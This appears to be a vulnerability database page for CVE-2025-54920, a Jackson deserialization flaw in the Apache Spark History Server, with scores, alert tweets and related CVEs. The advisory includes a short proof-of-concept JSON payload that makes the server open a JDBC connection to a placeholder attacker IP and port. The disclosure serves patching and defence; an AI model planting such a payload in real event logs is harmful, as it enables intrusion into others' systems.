CVE-2025-54920

Published Mar 16, 2026

Last updated 2 months ago

CVSS high 8.8

Overview

AI description

Automated description summarized from trusted sources.

CVE-2025-54920 is a code execution vulnerability found in Apache Spark versions prior to 3.5.7 and 4.0.1. This flaw resides within the Spark History Web UI and is caused by overly permissive Jackson deserialization of event log data. An attacker who has access to the Spark event logs directory can exploit this vulnerability by injecting malicious JSON payloads. These payloads trigger the deserialization of arbitrary classes, ultimately enabling command execution on the host where the Spark History Server is running.

Description
This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue. Summary Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server. Details The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization. The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability. Proof of Concept: 1. Run Spark with event logging enabled, writing to a writable directory (spark-logs). 2. Inject the following JSON at the beginning of an event log file: { "Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://<IP>:<PORT>/", "info": { "hive.metastore.uris": "thrift://<IP>:<PORT>" } } 3. Start the Spark History Server with logs pointing to the modified directory. 4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection. Impact An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.
Source
security@apache.org
NVD status
Analyzed
Products
spark

Risk scores

CVSS 3.1

Type
Secondary
Base score
8.8
Impact score
5.9
Exploitability score
2.8
Vector string
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Severity
HIGH

Weaknesses

security@apache.org
CWE-502

Social media

Hype score
Not currently trending

  1. 🚨 CYBERDUDEBIVASH SENTINEL APEX ALERT 🚨 Threat: CVE-2025-54920 - Apache Spark: Spark History Server Code Execution Vulnerability Intel Report: https://t.co/37NbiQQkDw

    @cyberbivash

    14 Mar 2026

    131 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  2. 🚨 CYBERDUDEBIVASH SENTINEL APEX ALERT 🚨 Threat: CVE-2025-54920 - Apache Spark: Spark History Server Code Execution Vulnerability Intel Report: https://t.co/4lQ2FLWGWa

    @cyberbivash

    14 Mar 2026

    130 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  3. 🚨 CYBERDUDEBIVASH SENTINEL APEX ALERT 🚨 Threat: CVE-2025-54920 - Apache Spark: Spark History Server Code Execution Vulnerability Intel Report: https://t.co/aI1ON2G0w3

    @cyberbivash

    14 Mar 2026

    115 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  4. 🚨 CYBERDUDEBIVASH SENTINEL APEX ALERT 🚨 Threat: CVE-2025-54920 - Apache Spark: Spark History Server Code Execution Vulnerability Intel Report: https://t.co/jFwYz1A4ep

    @cyberbivash

    14 Mar 2026

    123 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  5. CVE-2025-54920 This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue. Summary Ap… https://t.co/pcr8nS24Le

    @CVEnew

    14 Mar 2026

    98 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  6. CVE-2025-54920: Apache Spark: Spark History Server Code Execution Vulnerability https://t.co/DspaZZSC1f in the Spark History Web UI due to overly permissive Jackson deserialization of event log data

    @oss_security

    14 Mar 2026

    675 Impressions

    0 Retweets

    2 Likes

    2 Bookmarks

    0 Replies

    0 Quotes

  7. CVE-2025-54920 CVE-2025-54920 https://t.co/w2OZOAzWce Customizable Vulnerability Alerts: https://t.co/U7998fz7yk

    @VulmonFeeds

    14 Mar 2026

    200 Impressions

    1 Retweet

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

Configurations

Related CVEs

  1. This issue affects Apache Spark versions before 3.4.4, 3.5.2 and 4.0.0. Apache Spark versions before 4.0.0, 3.5.2 and 3.4.4 use an insecure default network encryption cipher for RPC communication between nodes. When spark.network.crypto.enabled is set to true (it is set to false by default), but spark.network.crypto.cipher is not explicitly configured, Spark defaults to AES in CTR mode (AES/CTR/NoPadding), which provides encryption without authentication. This vulnerability allows a man-in-the-middle attacker to modify encrypted RPC traffic undetected by flipping bits in ciphertext, potentially compromising heartbeat messages or application data and affecting the integrity of Spark workflows. To mitigate this issue, users should either configure spark.network.crypto.cipher to AES/GCM/NoPadding to enable authenticated encryption or enable SSL encryption by setting spark.ssl.enabled to true, which provides stronger transport security.CVE-2025-55039
  2. It technically possible for a user to upload a file to a conversation despite the file upload functionality being disabled. The file upload functionality can be enabled or disabled for specific use cases through configuration. In case the functionality is disabled for at least one use case, the system nevertheless allows files to be uploaded through direct API requests. During the upload file, interception and allowed file type rules are still applied correctly. If file sharing is generally enabled, this issue is not of concern.CVE-2025-3518
  3. Signing cookies is an application security feature that adds a digital signature to cookie data to verify its authenticity and integrity. The signature helps prevent malicious actors from modifying the cookie value, which can lead to security vulnerabilities and exploitation. Apache Hive’s service component accidentally exposes the signed cookie to the end user when there is a mismatch in signature between the current and expected cookie. Exposing the correct cookie signature can lead to further exploitation. The vulnerable CookieSigner logic was introduced in Apache Hive by HIVE-9710 (1.2.0) and in Apache Spark by SPARK-14987 (2.0.0). The affected components are the following: * org.apache.hive:hive-service * org.apache.spark:spark-hive-thriftserver_2.11 * org.apache.spark:spark-hive-thriftserver_2.12CVE-2024-23945
  4. Apache Spark Command Injection VulnerabilityCVE-2022-33891
  5. In Eclipse Jetty 9.4.6.v20170531 to 9.4.36.v20210114 (inclusive), 10.0.0, and 11.0.0 when Jetty handles a request containing multiple Accept headers with a large number of “quality” (i.e. q) parameters, the server may enter a denial of service (DoS) state due to high CPU usage processing those quality values, resulting in minutes of CPU time exhausted processing those quality values.CVE-2020-27223

References

Sources include official advisories and independent security research.